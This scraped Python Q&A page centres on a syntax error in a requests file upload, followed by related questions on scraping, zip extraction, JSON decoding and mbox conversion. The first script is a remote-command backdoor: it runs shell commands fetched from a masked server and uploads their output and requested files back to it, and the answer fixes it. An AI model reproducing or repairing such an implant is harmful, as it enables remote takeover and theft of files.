Send file using POST requests in Python3 [ error: invalid syntax ] - python-3.x

I am trying to send file using post method in requests module in python 3.5 , I am getting error saying "invalid syntax" in these lines,
files = ('file':open(path,'rb'))
r = requests.post(('htttp://#########', files= files))
Full code is as follows.
import requests
import subprocess
import time
import os
while True:
req = requests.get('htttp://########')
command = req.text
if 'terminate' in command:
break
elif 'grab' in command:
grab,path = command.split('*')
if os.path.exists(path):
url = 'http://#########/store'
files = ('file':open(path,'rb'))
r = requests.post(('htttp://#########', files= files))
else:
post_request = requests.post(url='htttp://#########',data='[-]
Unable to find file !')
else:
CMD = subprocess.Popen(command,shell=True, stderr=subprocess.PIPE,
stdin=subprocess.PIPE,stdout=subprocess.PIPE)
post_request=requests.post(url='htttp://########',data=CMD.stdout.read())
post_request = requests.post(url= 'htttp://######',
data=CMD.stderr.read())
time.sleep(3)

You probably want this:
files = {'file': open(path, 'rb')}
r = requests.post('htttp://#########', files=files)
dicts are created using curly braces, not parentheses, and you had extra parentheses around the parameters in your call to requests.post.

Related

Problem To Scraping Wikipedia Images Via Python

I wrote a Program With Python For Scraping First Image Link of a query in WikipediaSomethings Like This Image:
My Python Program Require These Below Libraries:
requests
bs4
html
re
When I Run My Code then I give an argument it Returns a Defined Error('Image-Not-Found'). please Help Me To solve the problem.
My Python Program Source code:
import requests
import bs4
import re
import html
# Create the parser
my_parser = argparse.ArgumentParser(description='Wikipedia Image Grabber')
# Add the arguments
my_parser.add_argument('Phrase',
metavar='Phrase',
type=str,
help='Phrase to Search')
# Execute the parse_args() method
args = my_parser.parse_args()
Phrase = args._get_kwargs()[0][1]
if '.' in Phrase or '-' in Phrase:
if '.' in Phrase and '-' in Phrase:
Phrase = str(Phrase).replace('-',' ')
elif '-' in Phrase and not '.' in Phrase:
Phrase = str(Phrase).replace('-',' ')
Phrase = html.escape(Phrase)
request = requests.get('https://fa.wikipedia.org/wiki/Special:Search?search=%s&go=Go&ns0=1' % Phrase).text
parser = bs4.BeautifulSoup(request, 'html.parser')
none_search_finder = parser.find_all('p', attrs = {'class':'mw-search-nonefound'})
if len(none_search_finder)==1:
print('No-Result')
exit()
else:
search_results = parser.find_all('div' , attrs = {'class':'mw-search-result-heading'})
if len(search_results)==0:
search_result = parser.find_all('h1', attrs = {'id':'firstHeading'})
if len(search_result)!=0:
link = 'https://fa.wikipedia.org/wiki/'+str(Phrase)
else:
print('Result-Error')
exit()
else:
selected_result = search_results[0]
regex_exp = r".*<a href=\"(.*)\" title="
regex_get_uri = re.findall(regex_exp, str(selected_result))
regex_result = str(regex_get_uri[0])
link = 'https://fa.wikipedia.org'+regex_result
#---------------
second_request = requests.get(link)
second_request_source = second_request.text
second_request_parser = bs4.BeautifulSoup(second_request_source, 'html.parser')
image_finder = second_request_parser.find_all('a', attrs = {'class':'image'})
if len(image_finder) == 0:
print('No-Image')
exit()
else:
image_finder_e = image_finder[0]
second_regex = r".*src=\"(.*)\".*decoding=\"async\""
regex_finder = re.findall(second_regex, str(image_finder_e))
if len(regex_finder)!=0:
regexed_uri = str(regex_finder[0])
img_link = regexed_uri.replace('//','https://')
print(img_link)
else:
print("Image-Not-Found")
You can do it without regex and the reason your code is not working is that on browser and on response the decoding = "async" position is not same.
here is a solution without regex.
import re
import requests
from bs4 import BeautifulSoup
url = 'https://en.wikipedia.org/wiki/Google'
soup = BeautifulSoup(requests.get(url).text,'html.parser')
imglinks = soup.find_all('a', attrs = {'class':'image'})[0]
for img in imglinks.find_all('img'):
print(img['src'].replace('//','https://'))
Output:
https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/196px-Google_2015_logo.svg.png

Power Shell script keep on missing after extraction of Zip folder using Python script

I am writing a python script to download zip file from URL and extract it then running power shell scripts to install the service.
Things work well with downloading zip and extraction, but when i am trying to run power shell script I am getting file not found error. suddenly the script is missing.
When I try to copy it from another folder its not showing up and it also missing from the source folder also.
Please help me to understand this problem
def make_zip(name):
cur_dir = os.getcwd()
with zipfile.ZipFile(name, "w") as z:
return True
def download(name):
url = "https://XXXXX/downloads/XXX-7.8.0-windows-x86_64.zip"
response = requests.get(url, stream=True)
handle = open(name, "wb")
for chunk in response.iter_content(chunk_size=512):
if chunk:
handle.write(chunk)
handle.close()
def extract(name):
cur_dir = os.getcwd()
with zipfile.ZipFile(name, 'r') as z:
z.extractall(cur_dir)
def install(service):
service = "test.ps1"
command_options = ["PowerShell.exe", "-ExecutionPolicy", "UnRestricted", "-File", service]
process_result = subprocess.run(command_options, stdout = subprocess.PIPE, stderr = subprocess.PIPE,
universal_newlines = True) # CALL PROCESS
print(process_result.returncode) # PRINT RETURN CODE OF PROCESS 0 = SUCCESS, NON-ZERO = FAIL
print(process_result.stdout) # PRINT STANDARD OUTPUT FROM POWERSHELL
print(process_result.stderr) # PRINT STANDARD ERROR FROM POWERSHELL ( IF ANY OTHERWISE ITS
NULL|NONE )
if process_result.returncode == 0: # COMPARING RESULT
Message = "Success !"
else:
Message = "Error Occurred !"
makezip('example') #creates example.zip file
download('example') #downloads the url file into example zip
extract('example') #extracts the zip
install('example') #to install the service

Get API response chunk encoded. ERROR: data byte not string (ubuntu)

I have some code that works when I run it on a Windows machine, but when it runs in Ubuntu on a google ComputeEngine VM I get the following error.
Traceback (most recent call last): File "firehose_get.py", line 43,
in
print(json.dumps(json.loads(line),indent=2)) File "/home/stuartkirkup/anaconda3/lib/python3.5/json/init.py", line
312, in loads
s.class.name)) TypeError: the JSON object must be str, not 'bytes'
It's exactly the same code that runs fine on Windows. I've done quite a bit of reading and it looks like an encoding issue - and as you'll see from some of the commented out sections in my code I've tried some ways to change the encoding but without joy. I've tried various things but can't work out how to debug it ... I'm fairly new to Python
I'm using Anaconda which some further reading says it has an ill advised setdefaultencoding hack built in.
Here is the stream header showing it's chunked data, which I believe is why it's bytes
{'Transfer-Encoding': 'chunked', 'Date': 'Thu, 17 Aug 2017 16:53:35 GMT', 'Content-Type': 'application/json', 'x-se
rver': 'db220', 'Content-Encoding': 'gzip'}
Code file - firehose_requests.py (with api keys infor replaced by ####)
import requests
MAX_REDIRECTS = 1000
def get(url, **kwargs):
kwargs.setdefault('allow_redirects', False)
for i in range(0, MAX_REDIRECTS):
response = requests.get(url, **kwargs)
#response.encoding = 'utf-8'
print ("test")
print (response.headers)
if response.status_code == requests.codes.moved or \
response.status_code == requests.codes.found:
if 'Location' in response.headers:
url = response.headers['Location']
content_type_header = response.headers.get('content_type')
print (content_type_header)
continue
else:
print ("Error when reading the Location field from HTTP headers")
return response
Code file - firehose_get.py
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth
# Make it work for Python 2+3 and with Unicode
import io
try:
to_unicode = unicode
except NameError:
to_unicode = str
#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##############-livestream-poc','488##############1')).json()
#print(request_access_token)
#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)
url = 'https://livestream.adobe.net/api/1/stream/eecoukvanilla-##############'
sleep_sec=0
rec_count=10
bearer = "Bearer " + access_token
headers = {"Authorization": bearer,"accept-encoding":"gzip,deflate"}
r = firehose_requests.get(url, stream=True, headers=headers)
#open empty file
with open('output_file2.txt', 'w') as outfile:
print('', file=outfile)
#Read the Stream
if r.status_code == requests.codes.ok:
count = 0
for line in r.iter_lines():
if line:
#write to screen
print ("\r\n")
print(json.dumps(json.loads(line),indent=2))
#append data to file
with open('output_file2.txt', 'a') as outfile:
print("\r\n", file=outfile)
print(json.dumps(json.loads(line),ensure_ascii = False),file=outfile)
#with io.open('output_file2.txt', 'w', encoding='utf8') as outfile:
# str_ = json.dumps(json.loads(line),
# indent=4, sort_keys=True,
# separators=(',', ': '), ensure_ascii=False)
# outfile.write(to_unicode(str_))
#Break the loop if there are is a -n argument
if rec_count is not None:
count = count + 1
if count >= rec_count:
break
#How long to wait between writes
if sleep_sec is not None :
sleep(sleep_sec)
else:
print ("There was a problem with the Request")
print ("Returned Status Code: " + str(r.status_code))
Thanks
OK I worked it out. I found a lot of people also getting this error but no solutions posted, so this is how I did it
parse and decode the JSON like this
json_parsed = json.loads(line.decode("utf-8"))
Full code:
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth
# Make it work for Python 2+3 and with Unicode
import io
try:
to_unicode = unicode
except NameError:
to_unicode = str
#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##########-livestream-poc','488################1')).json()
#print(request_access_token)
#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)
url = 'https://livestream.adobe.net/api/1/stream/##################'
sleep_sec=0
rec_count=10
bearer = "Bearer " + access_token
headers = {"Authorization": bearer,"accept-encoding":"gzip,deflate"}
r = firehose_requests.get(url, stream=True, headers=headers, )
#open empty file
with open('output_file.txt', 'w') as outfile:
print('', file=outfile)
#Read the Stream
if r.status_code == requests.codes.ok:
count = 0
for line in r.iter_lines():
if line:
#parse and decode the JSON
json_parsed = json.loads(line.decode("utf-8"))
#write to screen
#print (str(json_parsed))
#append data to file
with open('output_file.txt', 'a') as outfile:
#write to file
print(json_parsed,file=outfile)
#Break the loop if there are is a -n argument
if rec_count is not None:
count = count + 1
if count >= rec_count:
break
#How long to wait between writes
if sleep_sec is not None :
sleep(sleep_sec)
else:
print ("There was a problem with the Request")
print ("Returned Status Code: " + str(r.status_code))

segmentation fault in python3

I am running python3 on a Ubuntu machine and have noticed that the following block of code is fickle. Sometimes it runs just fine, other times it produces a segmentation fault. I don't understand why. Can someone explain what might be going on?
Basically what the code does is try to read S&P companies from Wikipedia and write the list of tickers to a file in the same directory as the script. If no connection to Wikipedia can be established, the script tries instead to read an existing list from file.
from urllib import request
from urllib.error import URLError
from bs4 import BeautifulSoup
import os
import pickle
import dateutil.relativedelta as dr
import sys
sys.setrecursionlimit(100000)
def get_standard_and_poors_500_constituents():
fname = (
os.path.abspath(os.path.dirname(__file__)) + "/sp500_constituents.pkl"
)
try:
# URL request, URL opener, read content.
req = request.Request(
"http://en.wikipedia.org/wiki/List_of_S%26P_500_companies"
)
opener = request.urlopen(req)
# Convert bytes to UTF-8.
content = opener.read().decode()
soup = BeautifulSoup(content, "lxml")
# HTML table we actually need is the first.
tables = soup.find_all("table")
external_class = tables[0].findAll("a", {"class":"external text"})
c = [ext.string for ext in external_class if not "reports" in ext]
with open(fname, "wb") as f:
pickle.dump(c, f)
except URLError:
with open(fname, "rb") as f:
c = pickle.load(f)
finally:
return c
sp500_constituents = get_standard_and_poors_500_constituents()
spdr_etf = "SPY"
sp500_index = "^GSPC"
def main():
X = get_standard_and_poors_500_constituents()
print(X)
if __name__ == "__main__":
main()

How convert an mbox to a JSON structure?

I am trying to convert an mbox to a JSON structure suitable for import into MongoDB i.e.
I am using mining social web second edition mailbox chapter but its not working properly.
I am trying to convert an mbox to a JSON structure suitable for import into MongoDB i.e.
I am using mining social web second edition mailbox chapter but its not working properly.
import sys
import mailbox
import email
import quopri
import json
import time
from BeautifulSoup import BeautifulSoup
from dateutil.parser import parse
MBOX = 'resources/ch06-mailboxes/data/enron.mbox'
OUT_FILE = MBOX + '.json'
def cleanContent(msg):
# Decode message from "quoted printable" format, but first
# re-encode, since decodestring will try to do a decode of its own
msg = quopri.decodestring(msg.encode('utf-8'))
# Strip out HTML tags, if any are present.
# Bail on unknown encodings if errors happen in BeautifulSoup.
try:
soup = BeautifulSoup(msg)
except:
return ''
return ''.join(soup.findAll(text=True))
# There's a lot of data to process, and the Pythonic way to do it is with a
# generator. See http://wiki.python.org/moin/Generators.
# Using a generator requires a trivial encoder to be passed to json for object
# serialization.
class Encoder(json.JSONEncoder):
def default(self, o): return list(o)
# The generator itself...
def gen_json_msgs(mb):
while 1:
msg = mb.next()
if msg is None:
break
yield jsonifyMessage(msg)
def jsonifyMessage(msg):
json_msg = {'parts': []}
for (k, v) in msg.items():
json_msg[k] = v.decode('utf-8', 'ignore')
# The To, Cc, and Bcc fields, if present, could have multiple items.
# Note that not all of these fields are necessarily defined.
for k in ['To', 'Cc', 'Bcc']:
if not json_msg.get(k):
continue
json_msg[k] = json_msg[k].replace('\n', '').replace('\t', '').replace('\r', '')\
.replace(' ', '').decode('utf-8', 'ignore').split(',')
for part in msg.walk():
json_part = {}
if part.get_content_maintype() != 'text':
print >> sys.stderr, "Skipping MIME content in JSONification
({0})".format(part.get_content_maintype())
continue
json_part['contentType'] = part.get_content_type()
content = part.get_payload(decode=False).decode('utf-8', 'ignore')
json_part['content'] = cleanContent(content)
json_msg['parts'].append(json_part)
# Finally, convert date from asctime to milliseconds since epoch using the
# $date descriptor so it imports "natively" as an ISODate object in MongoDB
then = parse(json_msg['Date'])
millis = int(time.mktime(then.timetuple())*1000 + then.microsecond/1000)
json_msg['Date'] = {'$date' : millis}
return json_msg
mbox = mailbox.UnixMailbox(open(MBOX, 'rb'), email.message_from_file)
# Write each message out as a JSON object on a separate line
# for easy import into MongoDB via mongoimport
f = open(OUT_FILE, 'w')
for msg in gen_json_msgs(mbox):
if msg != None:
f.write(json.dumps(msg, cls=Encoder) + '\n')
f.close()
print "All done"
getting error:
80 # for easy import into MongoDB via mongoimport
81
---> 82 f = open(OUT_FILE, 'w')
83 for msg in gen_json_msgs(mbox):
84 if msg != None:
IOError: [Errno 13] Permission denied: 'resources/ch06-mailboxes/data/enron.mbox.json'
The code you mentioned became obsolete in Third Edition of Mining Social Web
I tried making a workable script that not just converts MBOX to JSON, but even extracts the Attachments to usable formats.
Link to the repo -
https://github.com/PS1607/mbox-to-json
Read the README file for usage instructions.
It seems that your problem is related to user permissions instead of Python. Line 82 tries to open a file in the "data" folder, but permission was denied. You should try executing your script using the sudo command from a terminal:
sudo python3 <your script name>
This should take care of the error you pointed out.
PS: Python 3 uses print as a function; line 88 should read
print('All done')

Resources